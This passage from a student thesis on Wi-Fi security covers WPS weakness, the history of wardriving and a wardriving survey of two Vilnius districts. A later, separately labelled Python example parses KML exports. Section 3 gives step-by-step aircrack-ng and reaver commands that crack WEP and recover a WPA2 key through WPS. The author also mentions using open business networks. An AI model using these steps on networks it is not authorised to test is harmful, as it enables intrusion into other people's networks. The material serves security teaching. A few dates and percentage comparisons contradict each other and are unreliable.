We must also keep in mind that WPA and WPA2 have a weak point: WPS. We have seen how easy it is to break WPA or WPA2 encryption with a brute force attack against WPS. WPS may be the easiest way to get access to our network, but it is also an open door in our wall. It is true that the WPS PIN I tried in this thesis work was a really easy one, and that the attack against a real one may take some hours, but still, it can be broken. We should turn it off.
The final conclusion is that the most common security measure nowadays is WPA/WPA2 (in Vilnius, WPA/WPA2 account for more or less 95% of the networks detected), but WEP is still in use in some networks. As said before, the security measures of those networks must be upgraded to WPA or WPA2 as soon as possible.
2.6 INTRODUCTION TO WARDRIVING
Wardriving, also called access point mapping, is the act of locating and possibly exploiting Wi-Fi networks while driving around a city or elsewhere, or on foot, using a portable computer, smartphone or tablet.
The resulting maps, although they were supposedly "born" only to keep statistics and to make users aware of the problems presented by these networks, are used to prepare routes, working meetings, etc., situations in which it can come in handy to use, occasionally, a wireless network that belongs to others.
There are also travel routes or meetings that are arranged with reference maps made by wardriving.
Scanning and identifying access points is not an illegal activity. However, accessing a Wi-Fi network without the authorization of its owner can be a criminal offence in many countries. It can be punished with different sanctions, from paying for the proportional fraction of the Internet service consumed during the connection to being treated as a criminal act of greater significance.
Wardriving began to become popular in 2000, when Peter Shipley, security consultant at the University of Berkeley, California, spent 18 months driving his car and recording access points. The findings and data were shown in July 2001, at the DefCon hacker conference in September.
The talk can be watched on the DefCon website and also on YouTube.
Picture 17: Peter Shipley, inventor of wardriving, during his speech in July 2001
Warchalking, which gave rise to "a language of symbols usually written in chalk on the walls informing interested parties of the existence of a wireless network at that point", was created within wardriving. The initially proposed set of symbols was later completed with a new set of symbols following the emergence of the new WPA / WPA2 technologies and the beginning of HoneyPot wireless networks.
Picture 18: warchalking symbols
Picture 19: warchalking signs in the real life
As we can see in the pictures above, the name "warchalking" is not a random one. It is called that because "warchalkers" used chalk to tell other people whether there were Wi-Fi networks in the area, what security measures they had and other details.
But chalk has a lot of problems.
Over time chalk became obsolete because of maintenance problems. Chalk gets wiped off, it is difficult to update, and to see the symbols you have to be there, which means you could just as well scan the environment for existing networks yourself without looking for chalk marks (with your smartphone or your laptop, for example).
This led to locating the access points with GPS coordinates. Thus were born projects like WiGLE (Wireless Geographic Logging Engine), which keeps a huge online repository storing more than 17 million access points with their corresponding geographic location. The project has a web tool that displays WiGLE data in Google Maps, and tools like JiGLE (Java Imaging Geographic Lookup Engine) and DiGLE (Delphi Imaging Geographic Lookup Engine) are clients that retrieve information from WiGLE and display it on Google Earth.
Another similar project is KisMap, currently in a Beta phase, which can work with Google Maps. The information stored in KisMap is the information collected with
Kismet, a wireless network detector for Linux that can use a GPS receiver, or with another compatible wireless network detector.
Picture 20: KisMap interface
But wardriving is not only done by individuals. For example, Google did its own wardriving. In 2010 Google explained that Street View cars were also doing wardriving (when it came out, it was shocking news). To explain itself, Google published a report.
The report indicates that Google stores information about mobile base stations and wireless access points in order to help geolocate the user when the device does not have GPS, or in places with no satellite signal, such as indoors.
To obtain this information, the document explains, the vehicles are equipped with an omnidirectional Maxrad BMMG24005 antenna. The Wi-Fi 802.11b / g / n signals are processed in the car with the Kismet software and finally sent to the Google data center.
Picture 21: A Maxrad BMMG24005 antenna, like the one Google uses
Google cars recorded the MAC address, SSID, signal level, channel and protocol (b / g / n) used, but not whether the Wi-Fi was open or protected by WEP / WPA.
These data are obtained passively, without Google's computers trying to communicate with the Wi-Fi router. In addition, the payload of the frames is discarded, so Google never accesses the content of the communication.
Of all the stored data, currently two items are important: the MAC address and the position of the vehicle at the time it was detected. This information never leaves Google's servers, since Google Location Services works as follows: the client (Firefox, Google Toolbar, etc.) sends a list of the MAC addresses detected by the Wi-Fi card of the user Google is trying to geolocate, and Google returns the approximate coordinates, calculated from its database.
Street View cars are only part of the "probes" Google has, since this information is also obtained from the data sent by the company's software when running on mobile phones or laptops.
3. ATTACKS ON WI-FI WEAKNESS POINTS
3.1 INTRODUCTION
This part of the thesis work consists in carrying out two attacks on two different wireless security measures by exploiting the weak points that have already been discussed. At the end of this section, two attacks will have been explained:
- Attack on WEP encryption.
- Attack on WPA2 encryption.
The aim of carrying out these attacks is to show how easily weak points can be exploited nowadays.
A lot of photos will be attached and every single step of the process will be explained, so it will be very easy to follow and to carry out the attack.
3.2 ATTACK ON WEP TECHNOLOGY
Next, a brief explanation of how to get access into a network with WEP encryption follows. To do this, Kali Linux has been chosen as the operating system (OS), which can be downloaded for free from its website (link), together with a few commands.
To run the OS, we can either install it on our computer or run it from a LiveCD. I chose the latter. To do this, all we have to do is "install" Kali Linux on a flash drive and, from the BIOS of our computer, boot from the flash drive.
Once we launch Kali Linux, the desktop will be displayed before us.
Note: the desktop may look different, depending on which version of Kali Linux the user is running.
Picture 22: Kali Linux desktop
Then we will open a new terminal and execute the following command: airmon-ng, as shown below:
Picture 23: airmon-ng
What this command does is list, in a table, all the wireless network cards installed on our computer. As we can see in the picture above, in my case I only have one. The system has assigned it the name wlan0. If there were more than one, the system would name them wlan1, wlan2, etc.
Now we are going to run three commands:
1. ifconfig wlan0 down
2. iwconfig wlan0 mode monitor
3. ifconfig wlan0 up
Picture 24: network card in monitor mode
Then we will execute the following command: airmon-ng check kill. This last command is not always required, but it was essential on my computer in order to be able to continue with the practice. Once this command has been run, the name of our network card will have changed to wlan0mon.
And finally, for the moment, we run the following command: airmon-ng start wlan0
Picture 25: starting the network card as monitor
With these commands, the wireless card has been switched into monitor mode. Now the network card is able to capture the wireless networks within its reach and to show specific data about them.
Picture 26: scanning the Wi-Fi networks.
Picture 27: airodump-ng wlan0mon result
The next command to execute is: airodump-ng wlan0mon
A table with all the networks within reach of our network card is displayed before us. We will be able to see the MAC address of our potential victims' routers, the channel on which the different routers transmit and their encryption (WEP, WPA ...).
In this case, we are going to choose a router with WEP security. The selected network will be called TEO 29.03. It is my personal network.
We press Control + C to exit monitoring once we have selected the network that will be our target. In this case, I have chosen the network called TEO-29-3.
Then we run the command airodump-ng -c CHANNEL_NUMBER -w NAME_YOU_WISH --bssid MAC_TARGET_ROUTER wlan0mon.
Once this command has been run, our terminal looks like this:
The -c parameter refers to the channel on which the victim router transmits. The -w parameter corresponds to the file we want to write to, where all the information will be saved; we write the name of our choice right after it. The --bssid parameter indicates that the MAC address of the victim router comes next.
After running this command, a table with the network we are going to attack will be displayed. Check the last picture.
The process could end here and we could just wait. But this process would be extremely slow. That is why we will open a new terminal and execute a new command that will help us increase the traffic and capture more packets.
We open a new terminal and run the following command:
aireplay-ng -1 0 -a MAC_TARGET_ROUTER wlan0mon
Picture 28: aireplay-ng -1 0 -a F0:84:2F:0B:DB:C1 wlan0mon
Picture 29: increasing the traffic with the access point
Immediately afterwards we open a new one to start injecting ARP packets, which will stimulate the victim router. The command we have to run is the following:
aireplay-ng -3 -b MAC_TARGET_ROUTER wlan0mon
Picture 30: injecting ARP packets
Picture 31: ARP packets being injected.
We see how the ARP packets start to flow. The process starts to go faster, but, as discussed in the theoretical part, the speed of this attack depends on the traffic of the victim router: the more traffic it has, the faster the attack goes.
Now we wait until we have a large number of IVs, more or less 30,000. This number is not a constant, but it is large enough to break WEP reliably.
Once we have reached the necessary number of IVs, we press Control + C in all the open terminals and close them. Then, at the top of the desktop screen, we click on the menu called Places and then on the Home folder entry. Before us we have something like this:
Picture 32: home folder and files created
The WEP-01.cap file is the file we created with the -w parameter. In this file we have the WEP key, but it is still encrypted and we have to decrypt it.
To decrypt the WEP key, we open a new terminal in the folder where the .cap file is and execute the following command: aircrack-ng FILE_NAME.cap
Keep in mind that this command is case sensitive.
Et voilà, the following is displayed before us:
Picture 33: the decryption worked
Picture 34: the WEP key is in our control
And there it is, we already have the key. We only need to remove the brackets and the colons: that is the key. Now we only need to connect to the router using the password we have obtained and surf the Internet.
We close all terminals and the process is complete.
3.3 ATTACK ON WPA & WPA2 TECHNOLOGY THROUGH WPS
An example of this kind of attack on WPS technology follows:
Picture 35: airmon-ng command
Picture 36: starting the network card as monitor
Pictures 37 & 38: monitoring the Wi-Fi networks
The previous images belong to the initial part of the process. Now the new part of the attack begins.
The next command to execute is: wash -i wlan0mon --ignore-fcs
The wash tool helps us discover whether the Wi-Fi networks within our reach have WPS activated or not.
The parameter -i wlan0mon specifies our network card, and the parameter --ignore-fcs makes the tool ignore possible checksum errors, which may interfere with its proper running.
Once the wash tool has been executed, a list of all the Wi-Fi networks will be displayed on our screen. We will be able to see the BSSID (MAC address) of the router, the channel on which each network is transmitting, the WPS version, whether WPS is locked or not, and also the SSID of the network.
Picture 39: checking if WPS is enabled or disabled
If the network we are targeting has WPS enabled, it is time to start the attack. We press Control+C and execute a new command:
reaver -i wlan0mon -b ACCESS_POINT_MAC -v
where -i wlan0mon is the parameter that specifies our network card, -b specifies the BSSID (the MAC address of the access point) and -v specifies the level of detail we want to see on the screen. For more information, we write -vv instead of -v.
Picture 40: attacking the WPS pin
Now it is time to wait. If our attack succeeds, we will learn the WPS PIN and the WPA2 password. If not, we will have to keep waiting, because the access point will reject us over and over again.
Picture 41: WPS pin & WPA password are now visible
As we can see in the previous image, our attack was successful and now we know the WPS PIN and the WPA password. We now have full access to the Internet through this Wi-Fi network.
We have seen how easy it is to break WPA or WPA2 security by exploiting the WPS feature. That is why it is recommended to turn off WPS.
3.4 CONCLUSION ON PRACTICAL WI-FI ATTACKS
Two attacks have been carried out: one against WEP technology and the other against WPA2 technology through the WPS weakness. The second attack may also work on WPA technology, since it also incorporates WPS.
The conclusions for each will be given separately.
The attack against WEP technology confirmed what was written in the theoretical part about that encryption system: it is an old and useless security measure that can be broken within minutes. Nowadays, WEP encryption is almost the same as having no encryption at all.
The attack against WPA2 required a different approach. WPA2 has emerged as the best encryption system available nowadays. Nevertheless, it is not infallible.
Some weak points have come to light recently, and the fact that it includes WPS technology makes it easier to break. The attack carried out took only some minutes before obtaining the WPS PIN and the network password. A WPS PIN may be easier for the user to remember, but it is also easier to break than the password. In order to keep our network secure, it is advisable to turn off WPS technology.
4. WARDRIVING IN THE CITY OF VILNIUS
4.1 TECHNOLOGY USED
A wardriving of the city of Vilnius, the capital of the Republic of Lithuania, will be performed as the practical part of this thesis work.
It has already been explained what wardriving is. Therefore, the way this wardriving was done and the technology used will be explained.
For this project a mobile phone with an Internet connection and GPS was used. The free application "WigleWifi" was installed on the mobile phone and used to perform the wardriving. The application can be found in the Google Play store. The Google application "Google Earth" was installed on a computer running Windows 10 as its operating system.
The mobile phone used was a Motorola Moto G from 2013. Two computers were used to perform the wardriving. The main one was a Toshiba Satellite L750 from 2011. Even though this laptop has an Intel i5 CPU and 6 gigabytes of RAM, when the KML file containing all the collected data is opened, the laptop struggles to show all the information.
Performing a wardriving is a very simple task. All that needed to be done was to start the application on the mobile phone with the GPS turned on. The user does not need to do anything, since the application detects all the networks on its own. The application tracks all wireless signals within reach and, thanks to the GPS, it is able to keep their position (using the GPS coordinates we will be able to see these wireless networks on a map with a tiny error).
The application is very intuitive and user friendly. IT knowledge is not required in order to use it.
Picture 42: WigleWifi screen while being used
Some aspects of the "WigleWifi" application will be explained next.
The picture above shows what the application screen looks like after a couple of
minutes of use.
First comes the number of wireless networks detected at that moment: how many of them
have been detected for the first time and how many had been detected before and are,
therefore, already stored in the application's database.
The next section is the user's position: the GPS coordinates. The application knows them
thanks to the GPS built into the mobile phone. The application also indicates that
there is a margin of error of, more or less, six meters. This margin changes, being smaller
if the user is under open sky and bigger if the user is inside a building or in a covered
area, such as a forest. It also tells us the number of satellites we are connected to. The
more satellites we are connected to, the better. In the case of the image, at that time the user
was connected to 12 satellites. If the user is moving (by car, walking...), the application also
reports the current speed.
Labeled with the number three is the number of wireless networks detected within a
given distance. In the particular case of the photo above, within a radius of about 500
meters, the application was able to detect about 20 wireless networks.
Then all the wireless networks detected in the current session are listed. The application
shows a lot of information on each network, such as the SSID, the time at which it was
detected, the channel on which it transmits and its security type (WEP, WPA...), among
many other things.
If we click on one of them, the application will open a new window that will show
information from that particular wireless network:
Picture 43: the window the application opens when we click on a specific Wi-Fi network.
The application also allows us to see the wireless networks on a map. Depending on the
zoom level, it will group the wireless networks into bubbles. Two images follow to
illustrate this.
If the zoom is close to the ground (or if the number of wireless networks is small), the
SSIDs of the networks appear on the screen. If the zoom level is high, or if the number of
wireless networks is large, the application groups them into bubbles to keep the screen
"cleaner". The SSIDs of the networks appear again as the user zooms in towards the
ground: the bubbles split into smaller bubbles until a zoom level is reached at which the
SSIDs are readable again.
Once a certain amount of data has been captured, it is time to export it to a KML file.
Once the KML file has been created, simply clicking on it will show the wardriving on
the screen, by opening it in Google Earth, which was installed beforehand.
In order to export all the information collected by "WigleWifi" into a KML file, all that
needs to be done is to open the side menu, located on the left of the screen, and choose
the option labeled "Data". Several options appear, "Export to KML" being the one that
creates the KML file. After a few seconds, a message is displayed on the screen
showing the location of the KML file.
Picture 46: Google Earth shows us an early wardriving of Vilnius
As can be seen in the previous image, once the KML file is opened, a map appears with
all the wireless networks that were detected during the wardriving. It is normal for it to
take a while to display all the information, since the amount of information is huge.
Picture 47: Wi-Fi networks detected in the city center of Vilnius
By clicking on one of them, a small window with information about the selected
wireless network is displayed, as in the mobile application:
Picture 48: example of the tiny information window displayed
Picture 49: same image as before, where we can see the information displayed
Also, on the left side of the screen, a list of all the wireless networks that were
detected in the course of the wardriving is displayed.
The name of the wireless network, the BSSID and the capabilities of each wireless
network are shown.
This can be seen in the next image:
Picture 50: once the KML file has been executed, the user might see something like this
Picture 51: all the wireless networks are listed on the left side of the screen
As has been said before, several characteristics of the wireless networks are shown in
the list. In blue and underlined, the SSID of each wireless network. Immediately below
it, the BSSID of the wireless network.
The BSSID (Basic Service Set Identifier) of a wireless network, or WLAN, is a unique
identifier carried in all the packets of a wireless network, so that they can be recognized
as belonging to that network.
Unlike the SSID, which can be shared by multiple BSSs, a BSSID can only be used in one.
It is formed from the MAC address, which consists of 48 bits (6 hexadecimal blocks), of the
wireless access point (WAP) that the network belongs to.
Finally, next to the label Capabilities, we can see the security type of the network (WEP,
WPA, WPA2...).
In the picture immediately below we can see everything just described:
Picture 52: example of the information displayed of one wireless network
It is possible to deselect some wireless networks. The deselected networks will not appear
in Google Earth. Sometimes this is very useful: for example, if only WPA2 networks need
to be displayed.
An example from the university area follows. At first, only those wireless networks whose
capabilities list just ESS (that is, no encryption) are displayed:
It can be seen that these are just the ones belonging to the university. If all of them are
selected, the image changes, since all the networks detected appear on the map:
Pictures 53 & 54: wireless networks detected at VGTU complex
As mentioned before, many more wireless networks now appear. The wireless network
called eduroam stands out: it is an international wireless network for students that can be
found not only in different places of the city of Vilnius, but in every single European city
with a university.
4.2 PRACTICAL WARDRIVING
Within the wardriving, a study and comparison of two different districts of the city of
Vilnius will be done. In this particular case, the districts to be compared are the Šeškinė
neighborhood, located about six kilometers from the city center of Vilnius, and the
Šnipiškės district, home of the financial district of Vilnius.
These two neighborhoods were chosen because they are opposites: while the first is a
bedroom suburb of Vilnius, the second is where most of the city's companies and banks,
and the town hall itself, are located.
It will be interesting to see which one has more wireless networks, in which one security
is better, and in which neighborhood it is easier to get access to the Internet.
4.2.1 WARDRIVING IN THE DISTRICT OF ŠNIPIŠKĖS
Picture 55: Vilnius business district
The Šnipiškės district, and more particularly the area known as the "Vilnius business
triangle", hosts many companies, both domestic and international, as well as various
bodies of the city government of Vilnius.
The first wardriving of this area of the city took place at the end of March 2016, and
the second one in May 2016. Doing this wardriving was very simple, and the data
was collected with the free application "Wigle".
In about one hour, the application detected, more or less, 150 wireless networks in a
relatively small area.
It must be mentioned here again, although it has already been said above, that this
wardriving was carried out with basic equipment, so it is likely that some wireless
networks appear in places that do not correspond to reality.
These irregularities will, obviously, be ignored.
Picture 56: Wardriving in Vilnius business district
The first surprising fact was the large number of access points found without any security.
These access points belonged overwhelmingly to the companies settled there (banks,
restaurants, hotels and the city hall...).
Access to the Internet was attempted through five of them. In two of them the connection
to the Internet worked without any inconvenience, the connection being completely
operational. In the other three I was asked by the network for some identification in order
to allow a connection. Interestingly, those in which the connection worked without any
problems were the ones that belonged to bank offices (Swedbank and DNB). Wireless
networks belonging to hotels were asking for some form of identification.
Picture 57: OPEN networks in Vilnius business district
Even though it is true that most of the wireless networks detected had WPA or WPA2 as
their protection system, making them very difficult to break, the presence of wireless
networks using WEP is no surprise, although, truth be told, they are a minority,
as shown in the following picture:
Picture 58: WEP networks in Vilnius business district
As with the WPA technology, WEP technology has been explained already in this thesis
work. At the time of writing, WEP technology can be broken in just a few minutes with
an average computer.
While the presence of wireless networks protected by this technology is not surprising,
since it was once very popular, nowadays WEP is a highly vulnerable technology. Its
presence, though a minority, in such an important area could be exploited for data theft or
other activities.
And finally, networks with WPA or WPA2 technology have turned out to be the majority,
which is not surprising.
Picture 59: WPA and WPA2 networks in Vilnius business district
Nowadays, WPA2 technology is the best choice when protecting a wireless network.
Although not invulnerable to certain attacks, such attacks require a long time, processing
power and sometimes some level of access to the network itself.
Within the latter networks, the presence of WPA2 is significantly higher than that of WPA,
the former being the safer one.
4.2.2 WARDRIVING IN THE DISTRICT OF ŠEŠKINĖ
We have already noted before that the district of Šeškinė is a purely residential area,
much as the Chantria neighborhood in the city of Leon could be considered. It is a
recently built neighborhood, with multi-storey buildings and few businesses or shops.
It is a purely Soviet neighborhood.
Picture 60: district of Šeškinė
Since it is a residential neighborhood, some differences were expected, such as finding
very few OPEN wireless networks, while the number of networks with WEP
technology was expected to be considerably higher than in the business district.
Picture 61: Wardriving in the district of Šeškinė
The first thing to observe on the map is the large number of detected networks (about two
hundred), higher than the number of networks detected in the business district, as well as
the majority presence of WPA and/or WPA2 over WEP.
Also surprising is the absence of wireless networks over a wide area, as we can see in the
picture below:
Picture 62: weird lack of wireless networks in the district of Šeškinė
Few networks without any protection were expected to be found, and so it turned out.
Overall, around twenty OPEN networks were found, though not all of them allowed a
connection to the Internet.
Out of those twenty OPEN networks, three belonged to printers with built-in Wi-Fi
technology. Another belonged to a kiosk (Lietuvos SPAUDA WiFi). While it is possible
to connect to the kiosk's network, it immediately asks for a username and a password.
Without those credentials, access to the Internet through this network was not
possible.
Five different OPEN networks were tested, and the connection to the Internet succeeded in
four of them. The fifth one never assigned an IP address, so access to the Internet through
it was not possible.
Picture 63: OPEN networks in the district of Šeškinė
As can be seen in the picture above, the number of wireless networks without any kind
of protection is lower than in the business district of Vilnius. This makes sense,
though, because while the business district has plenty of restaurants, hotels and other
places that offer their customers a free Internet connection, the bedroom district
has hardly any establishments of that kind.
The number of networks with WEP protection in the neighborhood of Šeškinė is not high,
only about a dozen of them having been detected with this kind of protection.
Picture 64: WEP networks in the district of Šeškinė
Finally, the networks protected with WPA or WPA2 technology. The number of networks
with this type of security is overwhelming, vastly exceeding the number of wireless
networks with the same kind of protection in the business district.
This makes sense, though, since statistically at least one wireless access point can be
found in every house, and WPA and WPA2 are, at the time of writing, the security
standard of wireless technology.
Picture 65: WPA and WPA2 networks in the district of Šeškinė
While more OPEN networks were detected in the business district of Vilnius, it was in
the Šeškinė district where more networks protected by WEP technology were found.
While I cannot guarantee that those networks belong to individuals, the low presence of
restaurants and shops indicates so.
4.2.3 COMPARISON OF BOTH WARDRIVINGS
Both wardrivings have been carried out and the differences are obvious. Some graphics
are included to demonstrate this. The first graphic corresponds to the business
district of Vilnius and the second one to the bedroom district.
Picture 66: graphic networks at Šnipiškės district
Picture 67: graphic networks at Šeškinė district
At first sight, both graphics look similar:
1. The vast majority of the networks have WPA or WPA2 as their encryption system.
2. The networks with WEP as their encryption system are the fewest.
3. OPEN networks are a reality.
But some remarks are required in order to understand the differences between these
two districts.
As can be seen in the graphics attached above, the number of OPEN networks is the
same in both districts. But this coincidence is misleading. While in the business district
most of the OPEN networks belong to restaurants or hotels, in the bedroom district most
of the OPEN networks turned out to be printer or kiosk Wi-Fi networks. It was impossible
to get access to the Internet through the latter.
The percentages are as follows:
In the business district, WPA & WPA2 networks are 85% of the networks detected. The WEP
encryption system is present in 5% of the networks detected and, therefore, 10% of
the networks are OPEN networks.
On the other hand, in the bedroom district WPA & WPA2 is present in 84.66% of the
networks. The difference is minuscule. WEP encryption can still be found in 2% of
the networks. OPEN networks are 13.33% of the networks detected.
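To make the KML export and the Capabilities field described in section 4.1 concrete, and the per-district percentages above reproducible, here is an added example that is not part of the thesis and not WigleWifi's own code: it parses a constructed, simplified KML sample, validates each BSSID as a 48-bit MAC, classifies the capability string as OPEN/WEP/WPA/WPA2 and computes the breakdown. The placement of the BSSID and Capabilities lines inside the placemark description is an assumption made for the sample, not WigleWifi's documented export format.

```python
"""Classify Wi-Fi networks from a WigleWifi-style KML export and compute the
security breakdown of section 4.2.3 (added example, not the thesis' code).
The KML layout is a constructed, simplified sample (assumption): each
Placemark carries the SSID in <name> and 'BSSID: ...' / 'Capabilities: ...'
lines in <description>, like the fields shown in Picture 52."""
import re
import xml.etree.ElementTree as ET
from collections import Counter

KML_NS = "{http://www.opengis.net/kml/2.2}"
# A BSSID is the access point's 48-bit MAC address: six two-digit hex blocks.
BSSID_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed sample placemarks (not real Vilnius data).
SAMPLE_KML = """<kml xmlns="http://www.opengis.net/kml/2.2"><Document>
<Placemark><name>CafeFree</name>
<description>BSSID: 00:11:22:33:44:55
Capabilities: [ESS]</description></Placemark>
<Placemark><name>OldRouter</name>
<description>BSSID: 66:77:88:99:AA:BB
Capabilities: [WEP][ESS]</description></Placemark>
<Placemark><name>HomeNet</name>
<description>BSSID: CC:DD:EE:FF:00:11
Capabilities: [WPA2-PSK-CCMP][ESS]</description></Placemark>
<Placemark><name>Glitch</name>
<description>BSSID: not-a-mac
Capabilities: [WPA-PSK-TKIP][ESS]</description></Placemark>
</Document></kml>"""

def classify(capabilities: str) -> str:
    """Map an Android-style capability string to the thesis' categories."""
    caps = capabilities.upper()
    if "WPA2" in caps or "RSN" in caps:
        return "WPA2"
    if "WPA" in caps:
        return "WPA"
    if "WEP" in caps:
        return "WEP"
    return "OPEN"  # only [ESS] (or nothing) means no encryption at all

def parse_networks(kml_text: str):
    """Yield (ssid, bssid, security); skip placemarks without a valid MAC."""
    root = ET.fromstring(kml_text)
    for pm in root.iter(KML_NS + "Placemark"):
        ssid = pm.findtext(KML_NS + "name", default="")
        desc = pm.findtext(KML_NS + "description", default="")
        bssid = re.search(r"BSSID:\s*(\S+)", desc)
        caps = re.search(r"Capabilities:\s*(\S+)", desc)
        if not bssid or not BSSID_RE.match(bssid.group(1)):
            continue  # mis-read placemark, like the irregularities noted in 4.2.1
        yield ssid, bssid.group(1).upper(), classify(caps.group(1) if caps else "")

def security_breakdown(kml_text: str) -> dict:
    """Return {category: (count, percent)} as used for the pie charts of 4.2.3."""
    counts = Counter(sec for _, _, sec in parse_networks(kml_text))
    total = max(sum(counts.values()), 1)
    return {sec: (n, round(100.0 * n / total, 2)) for sec, n in counts.items()}
```

Running `security_breakdown` over a real export gives the count and percentage per category directly, so the comparison between the two districts no longer depends on reading values off a chart.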
The previous images may look the same, but if we look at a pie chart of both wardrivings,
the differences can be easily seen:
Pictures 68 and 69: pie charts of the networks detected.
The main difference lies in the percentage of OPEN networks. The absolute number is the
same, but it has been shown that in the bedroom district the percentage of OPEN
networks is two times bigger.
On the other hand, the number of WEP networks is three times smaller in the business
district, but the percentage is smaller. It makes sense since, as it has been discussed